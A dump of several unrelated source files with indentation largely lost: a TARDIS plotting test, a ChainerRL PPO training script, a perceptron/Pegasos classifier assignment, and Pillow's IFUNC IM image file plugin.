if isinstance(data, Line2D):
self.hdf_file.create_carray(
trace_group,
name="data",
obj=data.get_xydata(),
)
self.hdf_file.create_carray(
trace_group, name="path", obj=data.get_path().vertices
)
pytest.skip("Reference data was generated during this run.")
else:
group = self.hdf_file.get_node("/" + subgroup_name)
# test output of the _make_colorbar_labels function
            np.testing.assert_equal(
                np.asarray(plotter._species_name),
                self.hdf_file.get_node(group, "_species_name")
                .read()
                .astype(str),
            )
# test output of the _make_colorbar_colors function
np.testing.assert_allclose(
                np.asarray(plotter._color_list),
self.hdf_file.get_node(group, "_color_list"),
)
fig_subgroup = self.hdf_file.get_node(group, "fig_data")
for index, data in enumerate(fig.get_children()):
trace_group = self.hdf_file.get_node(
fig_subgroup, "_" + str(index)
)
if isinstance(data.get_label(), str):
assert (
data.get_label()
== self.hdf_file.get_node(trace_group, "label")
.read()
.decode()
)
# test element contributions
if isinstance(data, PolyCollection):
for index, path in enumerate(data.get_paths()):
np.testing.assert_allclose(
path.vertices,
self.hdf_file.get_node(
trace_group, "path" + str(index)
),
)
# compare line plot data
if isinstance(data, Line2D):
np.testing.assert_allclose(
data.get_xydata(),
self.hdf_file.get_node(trace_group, "data"),
)
np.testing.assert_allclose(
data.get_path().vertices,
self.hdf_file.get_node(trace_group, "path"),
)
@pytest.mark.parametrize("packets_mode", ["virtual", "real"])
@pytest.mark.parametrize("packet_wvl_range", [[500, 9000] * u.AA, None])
@pytest.mark.parametrize("distance", [10 * u.Mpc, None])
@pytest.mark.parametrize("show_modeled_spectrum", [True, False])
@pytest.mark.parametrize("nelements", [1, None])
@pytest.mark.parametrize(
"species_list", [["Si II", "Ca II", "C", "Fe I-V"], None]
)
def test_generate_plot_ply(
self,
request,
plotter,
packets_mode,
packet_wvl_range,
distance,
show_modeled_spectrum,
observed_spectrum,
nelements,
species_list,
):
"""
        Test generate_plot_ply method.
Parameters
----------
request : _pytest.fixtures.SubRequest
plotter : tardis.visualization.tools.sdec_plot.SDECPlotter
packets_mode : str
packet_wvl_range : astropy.units.quantity.Quantity
distance : astropy.units.quantity.Quantity
show_modeled_spectrum : bool
observed_spectrum : tuple of two astropy.units.quantity.Quantity values
nelements : int
species_list : list of str
"""
subgroup_name = make_valid_name("ply" + request.node.callspec.id)
fig = plotter.generate_plot_ply(
packets_mode=packets_mode,
packet_wvl_range=packet_wvl_range,
distance=distance,
show_modeled_spectrum=show_modeled_spectrum,
observed_spectrum=observed_spectrum if distance else None,
nelements=nelements,
species_list=species_list,
)
if request.config.getoption("--generate-reference"):
group = self.hdf_file.create_group(
self.hdf_file.root,
name=subgroup_name,
)
self.hdf_file.create_carray(
group, name="_species_name", obj=plotter._species_name
)
self.hdf_file.create_carray(
group, name="_color_list", obj=plotter._color_list
)
fig_subgroup = self.hdf_file.create_group(
group,
name="fig_data",
)
for index, data in enumerate(fig.data):
trace_group = self.hdf_file.create_group(
fig_subgroup,
name="_" + str(index),
)
if data.stackgroup:
self.hdf_file.create_array(
trace_group,
name="stackgroup",
obj=data.stackgroup.encode(),
)
if data.name:
self.hdf_file.create_array(
trace_group,
name="name",
obj=data.name.encode(),
)
self.hdf_file.create_carray(
trace_group,
name="x",
obj=data.x,
)
self.hdf_file.create_carray(
trace_group,
name="y",
obj=data.y,
)
pytest.skip("Reference data was generated during this run.")
else:
group = self.hdf_file.get_node("/", subgroup_name)
# test output of the _make_colorbar_labels function
            np.testing.assert_equal(
                np.asarray(plotter._species_name),
                self.hdf_file.get_node(group, "_species_name")
                .read()
                .astype(str),
            )
# test output of the _make_colorbar_colors function
np.testing.assert_allclose(
                np.asarray(plotter._color_list),
self.hdf_file.get_node(group, "_color_list"),
)
fig_subgroup = self.hdf_file.get_node(group, "fig_data")
for index, data in enumerate(fig.data):
trace_group = self.hdf_file.get_node(
fig_subgroup, "_" + str(index)
)
if data.stackgroup:
assert (
data.stackgroup
== self.hdf_file.get_node(trace_group, "stackgroup")
.read()
.decode()
)
if data.name:
assert (
data.name
== self.hdf_file.get_node(trace_group, "name")
.read()
.decode()
)
np.testing.assert_allclose(
self.hdf_file.get_node(trace_group, "x"), data.x
)
np.testing.assert_allclose(
self.hdf_file.get_node(trace_group, "y"), data.y
)
|
the-stack_0_12421 | """A training script of PPO on OpenAI Gym Mujoco environments.
This script follows the settings of https://arxiv.org/abs/1709.06560 as much
as possible.
"""
import argparse
import functools
import chainer
from chainer import functions as F
from chainer import links as L
import gym
import gym.spaces
import numpy as np
import chainerrl
from chainerrl.agents import PPO
from chainerrl import experiments
from chainerrl import misc
def main():
import logging
parser = argparse.ArgumentParser()
parser.add_argument('--gpu', type=int, default=0,
help='GPU to use, set to -1 if no GPU.')
parser.add_argument('--env', type=str, default='Hopper-v2',
help='OpenAI Gym MuJoCo env to perform algorithm on.')
parser.add_argument('--num-envs', type=int, default=1,
help='Number of envs run in parallel.')
parser.add_argument('--seed', type=int, default=0,
help='Random seed [0, 2 ** 32)')
parser.add_argument('--outdir', type=str, default='results',
help='Directory path to save output files.'
' If it does not exist, it will be created.')
parser.add_argument('--steps', type=int, default=2 * 10 ** 6,
help='Total number of timesteps to train the agent.')
parser.add_argument('--eval-interval', type=int, default=100000,
help='Interval in timesteps between evaluations.')
parser.add_argument('--eval-n-runs', type=int, default=100,
help='Number of episodes run for each evaluation.')
parser.add_argument('--render', action='store_true',
help='Render env states in a GUI window.')
parser.add_argument('--demo', action='store_true',
help='Just run evaluation, not training.')
parser.add_argument('--load-pretrained', action='store_true',
default=False)
parser.add_argument('--load', type=str, default='',
help='Directory to load agent from.')
parser.add_argument('--logger-level', type=int, default=logging.INFO,
help='Level of the root logger.')
parser.add_argument('--monitor', action='store_true',
help='Wrap env with gym.wrappers.Monitor.')
parser.add_argument('--log-interval', type=int, default=1000,
help='Interval in timesteps between outputting log'
' messages during training')
parser.add_argument('--update-interval', type=int, default=2048,
help='Interval in timesteps between model updates.')
parser.add_argument('--epochs', type=int, default=10,
help='Number of epochs to update model for per PPO'
' iteration.')
parser.add_argument('--batch-size', type=int, default=64,
help='Minibatch size')
args = parser.parse_args()
logging.basicConfig(level=args.logger_level)
# Set a random seed used in ChainerRL
misc.set_random_seed(args.seed, gpus=(args.gpu,))
# Set different random seeds for different subprocesses.
# If seed=0 and processes=4, subprocess seeds are [0, 1, 2, 3].
# If seed=1 and processes=4, subprocess seeds are [4, 5, 6, 7].
process_seeds = np.arange(args.num_envs) + args.seed * args.num_envs
assert process_seeds.max() < 2 ** 32
args.outdir = experiments.prepare_output_dir(args, args.outdir)
def make_env(process_idx, test):
env = gym.make(args.env)
# Use different random seeds for train and test envs
process_seed = int(process_seeds[process_idx])
env_seed = 2 ** 32 - 1 - process_seed if test else process_seed
env.seed(env_seed)
# Cast observations to float32 because our model uses float32
env = chainerrl.wrappers.CastObservationToFloat32(env)
if args.monitor:
env = chainerrl.wrappers.Monitor(env, args.outdir)
if args.render:
env = chainerrl.wrappers.Render(env)
return env
def make_batch_env(test):
return chainerrl.envs.MultiprocessVectorEnv(
[functools.partial(make_env, idx, test)
             for idx in range(args.num_envs)])
# Only for getting timesteps, and obs-action spaces
sample_env = gym.make(args.env)
timestep_limit = sample_env.spec.max_episode_steps
obs_space = sample_env.observation_space
action_space = sample_env.action_space
print('Observation space:', obs_space)
print('Action space:', action_space)
assert isinstance(action_space, gym.spaces.Box)
# Normalize observations based on their empirical mean and variance
obs_normalizer = chainerrl.links.EmpiricalNormalization(
obs_space.low.size, clip_threshold=5)
# While the original paper initialized weights by normal distribution,
# we use orthogonal initialization as the latest openai/baselines does.
winit = chainerrl.initializers.Orthogonal(1.)
winit_last = chainerrl.initializers.Orthogonal(1e-2)
action_size = action_space.low.size
policy = chainer.Sequential(
L.Linear(None, 64, initialW=winit),
F.tanh,
L.Linear(None, 64, initialW=winit),
F.tanh,
L.Linear(None, action_size, initialW=winit_last),
chainerrl.policies.GaussianHeadWithStateIndependentCovariance(
action_size=action_size,
var_type='diagonal',
var_func=lambda x: F.exp(2 * x), # Parameterize log std
var_param_init=0, # log std = 0 => std = 1
),
)
vf = chainer.Sequential(
L.Linear(None, 64, initialW=winit),
F.tanh,
L.Linear(None, 64, initialW=winit),
F.tanh,
L.Linear(None, 1, initialW=winit),
)
# Combine a policy and a value function into a single model
model = chainerrl.links.Branched(policy, vf)
opt = chainer.optimizers.Adam(3e-4, eps=1e-5)
opt.setup(model)
agent = PPO(
model,
opt,
obs_normalizer=obs_normalizer,
gpu=args.gpu,
update_interval=args.update_interval,
minibatch_size=args.batch_size,
epochs=args.epochs,
clip_eps_vf=None,
entropy_coef=0,
standardize_advantages=True,
gamma=0.995,
lambd=0.97,
)
if args.load or args.load_pretrained:
# either load or load_pretrained must be false
assert not args.load or not args.load_pretrained
if args.load:
agent.load(args.load)
else:
agent.load(misc.download_model(
"PPO", args.env,
model_type="final")[0])
if args.demo:
env = make_batch_env(True)
eval_stats = experiments.eval_performance(
env=env,
agent=agent,
n_steps=None,
n_episodes=args.eval_n_runs,
max_episode_len=timestep_limit)
print('n_runs: {} mean: {} median: {} stdev {}'.format(
args.eval_n_runs, eval_stats['mean'], eval_stats['median'],
eval_stats['stdev']))
else:
experiments.train_agent_batch_with_evaluation(
agent=agent,
env=make_batch_env(False),
eval_env=make_batch_env(True),
outdir=args.outdir,
steps=args.steps,
eval_n_steps=None,
eval_n_episodes=args.eval_n_runs,
eval_interval=args.eval_interval,
log_interval=args.log_interval,
max_episode_len=timestep_limit,
save_best_so_far_agent=False,
)
if __name__ == '__main__':
main()
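# Example invocations (illustrative only; the script file name below is an
# assumption -- the flags correspond to the argparse options defined in main()):
#   python train_ppo_gym.py --env Hopper-v2 --gpu -1 --steps 1000000
#   python train_ppo_gym.py --demo --load-pretrained --gpu -1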
|
the-stack_0_12422 | from string import punctuation, digits
import numpy as np
import random
# Part I
#pragma: coderesponse template
def get_order(n_samples):
try:
with open(str(n_samples) + '.txt') as fp:
line = fp.readline()
return list(map(int, line.split(',')))
except FileNotFoundError:
random.seed(1)
indices = list(range(n_samples))
random.shuffle(indices)
return indices
#pragma: coderesponse end
#pragma: coderesponse template
def hinge_loss_single(feature_vector, label, theta, theta_0):
"""
Finds the hinge loss on a single data point given specific classification
parameters.
Args:
feature_vector - A numpy array describing the given data point.
label - A real valued number, the correct classification of the data
point.
theta - A numpy array describing the linear classifier.
theta_0 - A real valued number representing the offset parameter.
Returns: A real number representing the hinge loss associated with the
given data point and parameters.
"""
# Your code here
# raise NotImplementedError
agreement = label * (np.dot(theta, feature_vector) + theta_0)
if agreement >= 1:
h_loss = 0
else:
h_loss = 1 - agreement
return h_loss
#pragma: coderesponse end
#pragma: coderesponse template
def hinge_loss_full(feature_matrix, labels, theta, theta_0):
"""
Finds the total hinge loss on a set of data given specific classification
parameters.
Args:
feature_matrix - A numpy matrix describing the given data. Each row
represents a single data point.
labels - A numpy array where the kth element of the array is the
correct classification of the kth row of the feature matrix.
theta - A numpy array describing the linear classifier.
theta_0 - A real valued number representing the offset parameter.
Returns: A real number representing the hinge loss associated with the
given dataset and parameters. This number should be the average hinge
loss across all of the points in the feature matrix.
"""
# Your code here
# raise NotImplementedError
n = feature_matrix.shape[0]
theta_vec = np.repeat(theta_0, n)
# gives the nx1 agreement vector
agreement = labels.T * (np.matmul(feature_matrix, theta) + theta_vec.T)
h_loss = (1.0/n) * np.sum(1 - agreement[agreement < 1])
return h_loss
#pragma: coderesponse end
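# Worked example (illustrative, not part of the assignment): with
# feature_vector = [1, 2], label = 1, theta = [-1, 1], theta_0 = -0.2 the
# agreement is 1 * ((-1)*1 + 1*2 - 0.2) = 0.8 < 1, so hinge_loss_single
# returns 1 - 0.8 = 0.2; hinge_loss_full averages such terms over all rows.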
#pragma: coderesponse template
def perceptron_single_step_update(
feature_vector,
label,
current_theta,
current_theta_0):
"""
Properly updates the classification parameter, theta and theta_0, on a
single step of the perceptron algorithm.
Args:
feature_vector - A numpy array describing a single data point.
label - The correct classification of the feature vector.
current_theta - The current theta being used by the perceptron
algorithm before this update.
current_theta_0 - The current theta_0 being used by the perceptron
algorithm before this update.
Returns: A tuple where the first element is a numpy array with the value of
theta after the current update has completed and the second element is a
real valued number with the value of theta_0 after the current updated has
completed.
"""
# Your code here
test = label * (np.dot(current_theta, feature_vector) + current_theta_0)
if test <= 10**-9:
current_theta += label * feature_vector
current_theta_0 += label
return current_theta, current_theta_0
# raise NotImplementedError
#pragma: coderesponse end
#pragma: coderesponse template
def perceptron(feature_matrix, labels, T):
"""
Runs the full perceptron algorithm on a given set of data. Runs T
iterations through the data set, there is no need to worry about
stopping early.
NOTE: Please use the previously implemented functions when applicable.
Do not copy paste code from previous parts.
NOTE: Iterate the data matrix by the orders returned by get_order(feature_matrix.shape[0])
Args:
feature_matrix - A numpy matrix describing the given data. Each row
represents a single data point.
labels - A numpy array where the kth element of the array is the
correct classification of the kth row of the feature matrix.
T - An integer indicating how many times the perceptron algorithm
should iterate through the feature matrix.
Returns: A tuple where the first element is a numpy array with the value of
theta, the linear classification parameter, after T iterations through the
feature matrix and the second element is a real number with the value of
theta_0, the offset classification parameter, after T iterations through
the feature matrix.
"""
# Your code here
n_cols = feature_matrix.shape[1]
# initialize
theta = np.zeros(n_cols)
theta_0 = 0.0
for t in range(T):
for i in get_order(feature_matrix.shape[0]):
theta, theta_0 = perceptron_single_step_update(feature_matrix[i, :], labels[i], theta, theta_0)
return theta, theta_0
# raise NotImplementedError
#pragma: coderesponse end
#pragma: coderesponse template
def average_perceptron(feature_matrix, labels, T):
"""
Runs the average perceptron algorithm on a given set of data. Runs T
iterations through the data set, there is no need to worry about
stopping early.
NOTE: Please use the previously implemented functions when applicable.
Do not copy paste code from previous parts.
NOTE: Iterate the data matrix by the orders returned by get_order(feature_matrix.shape[0])
Args:
feature_matrix - A numpy matrix describing the given data. Each row
represents a single data point.
labels - A numpy array where the kth element of the array is the
correct classification of the kth row of the feature matrix.
T - An integer indicating how many times the perceptron algorithm
should iterate through the feature matrix.
Returns: A tuple where the first element is a numpy array with the value of
the average theta, the linear classification parameter, found after T
iterations through the feature matrix and the second element is a real
number with the value of the average theta_0, the offset classification
parameter, found after T iterations through the feature matrix.
Hint: It is difficult to keep a running average; however, it is simple to
find a sum and divide.
"""
# Your code here
# raise NotImplementedError
iter_times = feature_matrix.shape[0] * T
n_cols = feature_matrix.shape[1]
# initialize
theta = np.zeros(n_cols)
theta_0 = 0.0
# track theta
theta_sum = np.zeros(n_cols)
theta_0_sum = 0.0
for t in range(T):
for i in get_order(feature_matrix.shape[0]):
theta, theta_0 = perceptron_single_step_update(feature_matrix[i, :], labels[i], theta, theta_0)
theta_sum += theta
theta_0_sum += theta_0
theta_final = theta_sum / iter_times
theta_0_final = theta_0_sum / iter_times
return theta_final, theta_0_final
#pragma: coderesponse end
#pragma: coderesponse template
def pegasos_single_step_update(
feature_vector,
label,
L,
eta,
current_theta,
current_theta_0):
"""
Properly updates the classification parameter, theta and theta_0, on a
single step of the Pegasos algorithm
Args:
feature_vector - A numpy array describing a single data point.
label - The correct classification of the feature vector.
        L - The lambda value being used to update the parameters.
eta - Learning rate to update parameters.
current_theta - The current theta being used by the Pegasos
algorithm before this update.
current_theta_0 - The current theta_0 being used by the
Pegasos algorithm before this update.
Returns: A tuple where the first element is a numpy array with the value of
theta after the current update has completed and the second element is a
real valued number with the value of theta_0 after the current updated has
completed.
"""
# Your code here
# raise NotImplementedError
if label * (np.dot(current_theta, feature_vector) + current_theta_0) <= 1:
current_theta = (1 - eta * L) * current_theta + eta * label * feature_vector
current_theta_0 = current_theta_0 + eta * label
else:
current_theta = (1 - eta * L) * current_theta
current_theta_0 = current_theta_0
return current_theta, current_theta_0
#pragma: coderesponse end
#pragma: coderesponse template
def pegasos(feature_matrix, labels, T, L):
"""
Runs the Pegasos algorithm on a given set of data. Runs T
iterations through the data set, there is no need to worry about
stopping early.
For each update, set learning rate = 1/sqrt(t),
where t is a counter for the number of updates performed so far (between 1
and nT inclusive).
NOTE: Please use the previously implemented functions when applicable.
Do not copy paste code from previous parts.
Args:
feature_matrix - A numpy matrix describing the given data. Each row
represents a single data point.
labels - A numpy array where the kth element of the array is the
correct classification of the kth row of the feature matrix.
T - An integer indicating how many times the algorithm
should iterate through the feature matrix.
        L - The lambda value being used to update the Pegasos
algorithm parameters.
Returns: A tuple where the first element is a numpy array with the value of
the theta, the linear classification parameter, found after T
iterations through the feature matrix and the second element is a real
number with the value of the theta_0, the offset classification
parameter, found after T iterations through the feature matrix.
"""
# Your code here
# raise NotImplementedError
n_cols = feature_matrix.shape[1]
# n_iters = n_rows * T
theta = np.zeros(n_cols)
theta_0 = 0.0
eta = 1.0
n_update = 0
for t in range(T):
for i in get_order(feature_matrix.shape[0]):
theta, theta_0 = pegasos_single_step_update(feature_matrix[i, :], labels[i], L, eta, theta, theta_0)
n_update += 1
eta = 1.0 / np.sqrt(n_update + 1)
return theta, theta_0
#pragma: coderesponse end
# Part II
#pragma: coderesponse template
def classify(feature_matrix, theta, theta_0):
"""
A classification function that uses theta and theta_0 to classify a set of
data points.
Args:
feature_matrix - A numpy matrix describing the given data. Each row
represents a single data point.
theta - A numpy array describing the linear classifier.
theta_0 - A real valued number representing the offset parameter.
Returns: A numpy array of 1s and -1s where the kth element of the array is
the predicted classification of the kth row of the feature matrix using the
given theta and theta_0. If a prediction is GREATER THAN zero, it should
be considered a positive classification.
"""
# Your code here
# raise NotImplementedError
y_hat = np.sign(np.matmul(feature_matrix, theta) + np.repeat(theta_0, feature_matrix.shape[0]))
y_hat[y_hat == 0] = -1
return y_hat
#pragma: coderesponse end
#pragma: coderesponse template
def classifier_accuracy(
classifier,
train_feature_matrix,
val_feature_matrix,
train_labels,
val_labels,
**kwargs):
"""
Trains a linear classifier using the perceptron algorithm with a given T
value. The classifier is trained on the train data. The classifier's
accuracy on the train and validation data is then returned.
Args:
classifier - A classifier function that takes arguments
(feature matrix, labels, **kwargs)
train_feature_matrix - A numpy matrix describing the training
data. Each row represents a single data point.
        val_feature_matrix - A numpy matrix describing the validation
data. Each row represents a single data point.
train_labels - A numpy array where the kth element of the array
is the correct classification of the kth row of the training
feature matrix.
val_labels - A numpy array where the kth element of the array
is the correct classification of the kth row of the validation
feature matrix.
**kwargs - Additional named arguments to pass to the classifier
(e.g. T or L)
Returns: A tuple in which the first element is the (scalar) accuracy of the
trained classifier on the training data and the second element is the
accuracy of the trained classifier on the validation data.
"""
# Your code here
# raise NotImplementedError
theta, theta_0 = classifier(train_feature_matrix, train_labels, **kwargs)
y_hat_train = classify(train_feature_matrix, theta, theta_0)
y_hat_val = classify(val_feature_matrix, theta, theta_0)
accuracy_train = accuracy(y_hat_train, train_labels)
accuracy_val = accuracy(y_hat_val, val_labels)
return accuracy_train, accuracy_val
#pragma: coderesponse end
#pragma: coderesponse template
def extract_words(input_string):
"""
Helper function for bag_of_words()
Inputs a text string
Returns a list of lowercase words in the string.
Punctuation and digits are separated out into their own words.
"""
for c in punctuation + digits:
input_string = input_string.replace(c, ' ' + c + ' ')
return input_string.lower().split()
#pragma: coderesponse end
#pragma: coderesponse template
def bag_of_words(texts):
"""
Inputs a list of string reviews
Returns a dictionary of unique unigrams occurring over the input while removing stopwords
Feel free to change this code as guided by Problem 9
"""
# Your code here
stopwords = np.loadtxt('stopwords.txt', dtype='str')
dictionary = {} # maps word to unique
for text in texts:
word_list = extract_words(text)
for word in word_list:
if word not in dictionary and word not in stopwords:
dictionary[word] = len(dictionary)
return dictionary
#pragma: coderesponse end
#pragma: coderesponse template
def extract_bow_feature_vectors(reviews, dictionary):
"""
Inputs a list of string reviews
Inputs the dictionary of words as given by bag_of_words
Returns the bag-of-words feature matrix representation of the data.
The returned matrix is of shape (n, m), where n is the number of reviews
and m the total number of entries in the dictionary.
Feel free to change this code as guided by Problem 9
"""
# Your code here
num_reviews = len(reviews)
feature_matrix = np.zeros([num_reviews, len(dictionary)])
for i, text in enumerate(reviews):
word_list = extract_words(text)
for word in word_list:
if word in dictionary:
feature_matrix[i, dictionary[word]] += 1
return feature_matrix
#pragma: coderesponse end
#pragma: coderesponse template
def accuracy(preds, targets):
"""
Given length-N vectors containing predicted and target labels,
    returns the fraction of correct predictions.
"""
return (preds == targets).mean()
#pragma: coderesponse end
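# Minimal self-check (an addition, not part of the original assignment): runs the
# classifiers above on a tiny linearly separable toy set when this module is
# executed directly. The data and hyperparameters are illustrative only.
if __name__ == '__main__':
    toy_features = np.array([[1.0, 1.0], [2.0, 1.0], [-1.0, -1.0], [-2.0, -0.5]])
    toy_labels = np.array([1, 1, -1, -1])
    # Perceptron: T passes over the toy data
    p_theta, p_theta_0 = perceptron(toy_features, toy_labels, T=10)
    p_acc = accuracy(classify(toy_features, p_theta, p_theta_0), toy_labels)
    print('perceptron theta:', p_theta, 'theta_0:', p_theta_0, 'train acc:', p_acc)
    # Pegasos: same data with a small regularization parameter
    g_theta, g_theta_0 = pegasos(toy_features, toy_labels, T=10, L=0.01)
    g_acc = accuracy(classify(toy_features, g_theta, g_theta_0), toy_labels)
    print('pegasos theta:', g_theta, 'theta_0:', g_theta_0, 'train acc:', g_acc)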
|
the-stack_0_12423 | #
# The Python Imaging Library.
# $Id$
#
# IFUNC IM file handling for PIL
#
# history:
# 1995-09-01 fl Created.
# 1997-01-03 fl Save palette images
# 1997-01-08 fl Added sequence support
# 1997-01-23 fl Added P and RGB save support
# 1997-05-31 fl Read floating point images
# 1997-06-22 fl Save floating point images
# 1997-08-27 fl Read and save 1-bit images
# 1998-06-25 fl Added support for RGB+LUT images
# 1998-07-02 fl Added support for YCC images
# 1998-07-15 fl Renamed offset attribute to avoid name clash
# 1998-12-29 fl Added I;16 support
# 2001-02-17 fl Use 're' instead of 'regex' (Python 2.1) (0.7)
# 2003-09-26 fl Added LA/PA support
#
# Copyright (c) 1997-2003 by Secret Labs AB.
# Copyright (c) 1995-2001 by Fredrik Lundh.
#
# See the README file for information on usage and redistribution.
#
import re
from . import Image, ImageFile, ImagePalette
from ._binary import i8
__version__ = "0.7"
# --------------------------------------------------------------------
# Standard tags
COMMENT = "Comment"
DATE = "Date"
EQUIPMENT = "Digitalization equipment"
FRAMES = "File size (no of images)"
LUT = "Lut"
NAME = "Name"
SCALE = "Scale (x,y)"
SIZE = "Image size (x*y)"
MODE = "Image type"
TAGS = {COMMENT: 0, DATE: 0, EQUIPMENT: 0, FRAMES: 0, LUT: 0, NAME: 0,
SCALE: 0, SIZE: 0, MODE: 0}
OPEN = {
# ifunc93/p3cfunc formats
"0 1 image": ("1", "1"),
"L 1 image": ("1", "1"),
"Greyscale image": ("L", "L"),
"Grayscale image": ("L", "L"),
"RGB image": ("RGB", "RGB;L"),
"RLB image": ("RGB", "RLB"),
"RYB image": ("RGB", "RLB"),
"B1 image": ("1", "1"),
"B2 image": ("P", "P;2"),
"B4 image": ("P", "P;4"),
"X 24 image": ("RGB", "RGB"),
"L 32 S image": ("I", "I;32"),
"L 32 F image": ("F", "F;32"),
# old p3cfunc formats
"RGB3 image": ("RGB", "RGB;T"),
"RYB3 image": ("RGB", "RYB;T"),
# extensions
"LA image": ("LA", "LA;L"),
"RGBA image": ("RGBA", "RGBA;L"),
"RGBX image": ("RGBX", "RGBX;L"),
"CMYK image": ("CMYK", "CMYK;L"),
"YCC image": ("YCbCr", "YCbCr;L"),
}
# ifunc95 extensions
for i in ["8", "8S", "16", "16S", "32", "32F"]:
OPEN["L %s image" % i] = ("F", "F;%s" % i)
OPEN["L*%s image" % i] = ("F", "F;%s" % i)
for i in ["16", "16L", "16B"]:
OPEN["L %s image" % i] = ("I;%s" % i, "I;%s" % i)
OPEN["L*%s image" % i] = ("I;%s" % i, "I;%s" % i)
for i in ["32S"]:
OPEN["L %s image" % i] = ("I", "I;%s" % i)
OPEN["L*%s image" % i] = ("I", "I;%s" % i)
for i in range(2, 33):
OPEN["L*%s image" % i] = ("F", "F;%s" % i)
# --------------------------------------------------------------------
# Read IM directory
split = re.compile(br"^([A-Za-z][^:]*):[ \t]*(.*)[ \t]*$")
def number(s):
try:
return int(s)
except ValueError:
return float(s)
##
# Image plugin for the IFUNC IM file format.
class ImImageFile(ImageFile.ImageFile):
format = "IM"
format_description = "IFUNC Image Memory"
_close_exclusive_fp_after_loading = False
def _open(self):
# Quick rejection: if there's not an LF among the first
# 100 bytes, this is (probably) not a text header.
if b"\n" not in self.fp.read(100):
raise SyntaxError("not an IM file")
self.fp.seek(0)
n = 0
# Default values
self.info[MODE] = "L"
self.info[SIZE] = (512, 512)
self.info[FRAMES] = 1
self.rawmode = "L"
while True:
s = self.fp.read(1)
# Some versions of IFUNC uses \n\r instead of \r\n...
if s == b"\r":
continue
if not s or s == b'\0' or s == b'\x1A':
break
# FIXME: this may read whole file if not a text file
s = s + self.fp.readline()
if len(s) > 100:
raise SyntaxError("not an IM file")
if s[-2:] == b'\r\n':
s = s[:-2]
elif s[-1:] == b'\n':
s = s[:-1]
try:
m = split.match(s)
except re.error:
raise SyntaxError("not an IM file")
if m:
k, v = m.group(1, 2)
# Don't know if this is the correct encoding,
# but a decent guess (I guess)
k = k.decode('latin-1', 'replace')
v = v.decode('latin-1', 'replace')
# Convert value as appropriate
if k in [FRAMES, SCALE, SIZE]:
v = v.replace("*", ",")
v = tuple(map(number, v.split(",")))
if len(v) == 1:
v = v[0]
elif k == MODE and v in OPEN:
v, self.rawmode = OPEN[v]
# Add to dictionary. Note that COMMENT tags are
# combined into a list of strings.
if k == COMMENT:
if k in self.info:
self.info[k].append(v)
else:
self.info[k] = [v]
else:
self.info[k] = v
if k in TAGS:
n += 1
else:
raise SyntaxError("Syntax error in IM header: " +
s.decode('ascii', 'replace'))
if not n:
raise SyntaxError("Not an IM file")
# Basic attributes
self._size = self.info[SIZE]
self.mode = self.info[MODE]
# Skip forward to start of image data
while s and s[0:1] != b'\x1A':
s = self.fp.read(1)
if not s:
raise SyntaxError("File truncated")
if LUT in self.info:
# convert lookup table to palette or lut attribute
palette = self.fp.read(768)
greyscale = 1 # greyscale palette
linear = 1 # linear greyscale palette
for i in range(256):
if palette[i] == palette[i+256] == palette[i+512]:
if i8(palette[i]) != i:
linear = 0
else:
greyscale = 0
if self.mode == "L" or self.mode == "LA":
if greyscale:
if not linear:
self.lut = [i8(c) for c in palette[:256]]
else:
if self.mode == "L":
self.mode = self.rawmode = "P"
elif self.mode == "LA":
self.mode = self.rawmode = "PA"
self.palette = ImagePalette.raw("RGB;L", palette)
elif self.mode == "RGB":
if not greyscale or not linear:
self.lut = [i8(c) for c in palette]
self.frame = 0
self.__offset = offs = self.fp.tell()
self.__fp = self.fp # FIXME: hack
if self.rawmode[:2] == "F;":
# ifunc95 formats
try:
# use bit decoder (if necessary)
bits = int(self.rawmode[2:])
if bits not in [8, 16, 32]:
self.tile = [("bit", (0, 0)+self.size, offs,
(bits, 8, 3, 0, -1))]
return
except ValueError:
pass
if self.rawmode in ["RGB;T", "RYB;T"]:
# Old LabEye/3PC files. Would be very surprised if anyone
# ever stumbled upon such a file ;-)
size = self.size[0] * self.size[1]
self.tile = [("raw", (0, 0)+self.size, offs, ("G", 0, -1)),
("raw", (0, 0)+self.size, offs+size, ("R", 0, -1)),
("raw", (0, 0)+self.size, offs+2*size, ("B", 0, -1))]
else:
# LabEye/IFUNC files
self.tile = [("raw", (0, 0)+self.size, offs,
(self.rawmode, 0, -1))]
@property
def n_frames(self):
return self.info[FRAMES]
@property
def is_animated(self):
return self.info[FRAMES] > 1
def seek(self, frame):
if not self._seek_check(frame):
return
self.frame = frame
if self.mode == "1":
bits = 1
else:
bits = 8 * len(self.mode)
size = ((self.size[0] * bits + 7) // 8) * self.size[1]
offs = self.__offset + frame * size
self.fp = self.__fp
self.tile = [("raw", (0, 0)+self.size, offs, (self.rawmode, 0, -1))]
def tell(self):
return self.frame
def _close__fp(self):
try:
self.__fp.close()
except AttributeError:
pass
finally:
self.__fp = None
#
# --------------------------------------------------------------------
# Save IM files
SAVE = {
# mode: (im type, raw mode)
"1": ("0 1", "1"),
"L": ("Greyscale", "L"),
"LA": ("LA", "LA;L"),
"P": ("Greyscale", "P"),
"PA": ("LA", "PA;L"),
"I": ("L 32S", "I;32S"),
"I;16": ("L 16", "I;16"),
"I;16L": ("L 16L", "I;16L"),
"I;16B": ("L 16B", "I;16B"),
"F": ("L 32F", "F;32F"),
"RGB": ("RGB", "RGB;L"),
"RGBA": ("RGBA", "RGBA;L"),
"RGBX": ("RGBX", "RGBX;L"),
"CMYK": ("CMYK", "CMYK;L"),
"YCbCr": ("YCC", "YCbCr;L")
}
def _save(im, fp, filename):
try:
image_type, rawmode = SAVE[im.mode]
except KeyError:
raise ValueError("Cannot save %s images as IM" % im.mode)
frames = im.encoderinfo.get("frames", 1)
fp.write(("Image type: %s image\r\n" % image_type).encode('ascii'))
if filename:
fp.write(("Name: %s\r\n" % filename).encode('ascii'))
fp.write(("Image size (x*y): %d*%d\r\n" % im.size).encode('ascii'))
fp.write(("File size (no of images): %d\r\n" % frames).encode('ascii'))
if im.mode == "P":
fp.write(b"Lut: 1\r\n")
fp.write(b"\000" * (511-fp.tell()) + b"\032")
if im.mode == "P":
fp.write(im.im.getpalette("RGB", "RGB;L")) # 768 bytes
ImageFile._save(im, fp, [("raw", (0, 0)+im.size, 0, (rawmode, 0, -1))])
#
# --------------------------------------------------------------------
# Registry
Image.register_open(ImImageFile.format, ImImageFile)
Image.register_save(ImImageFile.format, _save)
Image.register_extension(ImImageFile.format, ".im")
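# Round-trip sketch (illustrative; the temporary path is arbitrary): once this
# plugin is registered, .im files go through the normal PIL entry points.
#
#     from PIL import Image
#     im = Image.new("RGB", (32, 32), (255, 0, 0))
#     im.save("/tmp/example.im")               # handled by _save() above
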